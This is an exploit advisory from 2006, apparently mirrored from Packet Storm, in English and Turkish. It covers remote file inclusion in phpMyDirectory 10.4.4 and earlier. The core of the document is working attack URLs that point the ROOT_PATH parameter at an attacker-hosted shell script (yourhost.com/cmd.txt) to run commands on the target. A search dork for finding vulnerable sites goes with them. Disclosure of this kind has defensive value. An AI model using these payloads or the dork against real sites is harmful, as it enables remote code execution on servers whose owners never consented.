phpmydir1044.txt

🗓️ 24 May 2006 00:00:00Reported by ajannType

packetstorm🔗 packetstormsecurity.com👁 25 Views

phpMyDirectory <= 10.4.4 Remote File Include Vulnerabilities, Footer.php Security Issu

`ENGLISH  
  
# Title : phpMyDirectory <= 10.4.4 Multiple Remote File Include Vulnerabilities  
  
# Dork : "powered by phpmydirectory"  
  
# Author : ajann  
  
# greetz : Nukedx,TheHacker   
  
# Exploit;  
  
### http://[target]/[path]/template/default/footer.php?ROOT_PATH=http://yourhost.com/cmd.txt?cmd=ls  
  
### http://[target]/[path]/template/Yellow/footer.php?ROOT_PATH=http://yourhost.com/cmd.txt?cmd=ls  
  
### http://[target]/[path]/defaults_setup.php?ROOT_PATH=http://yourhost.com/cmd.txt?cmd=ls  
  
### SOME; http://[target]/[path]/template/default/test/header.php?ROOT_PATH=http://yourhost.com/cmd.txt?cmd=ls  
  
# ajann,Turkey  
  
  
TURKISH  
  
# Başlık : phpMyDirectory <= 10.4.4 Multiple Remote File Include Vulnerabilities  
# Sözcük[Arama] : "powered by phpmydirectory"  
# Açığı Bulan : ajann  
# greetz : Nukedx,TheHacker   
# Açık bulunan dosyalar;  
  
### http://[target]/[path]/template/default/footer.php?ROOT_PATH=http://yourhost.com/cmd.txt?cmd=ls  
### http://[target]/[path]/template/Yellow/footer.php?ROOT_PATH=http://yourhost.com/cmd.txt?cmd=ls  
### http://[target]/[path]/defaults_setup.php?ROOT_PATH=http://yourhost.com/cmd.txt?cmd=ls  
### SOME; http://[target]/[path]/template/default/test/header.php?ROOT_PATH=http://yourhost.com/cmd.txt?cmd=ls  
  
Açıklama:   
Temalarda bulunan footer.php dosyası güvenlik açığına yol açmaktadır.Bu sayede uzaktan kod çalıştırılabilir.  
defaults_setup.php kurulumdan sonra silinmemişse aynı açık uygulanabilmektedir.  
test/header.php bölümü ise bazen denk gelmektedir,aynı açık bulunmaktadır.  
Açık 10.4.4 dahil alt sürümlerinde çalışmaktadır.  
  
Thanks.  
`

24 May 2006 00:00Current

7.4High risk

Vulners AI Score7.4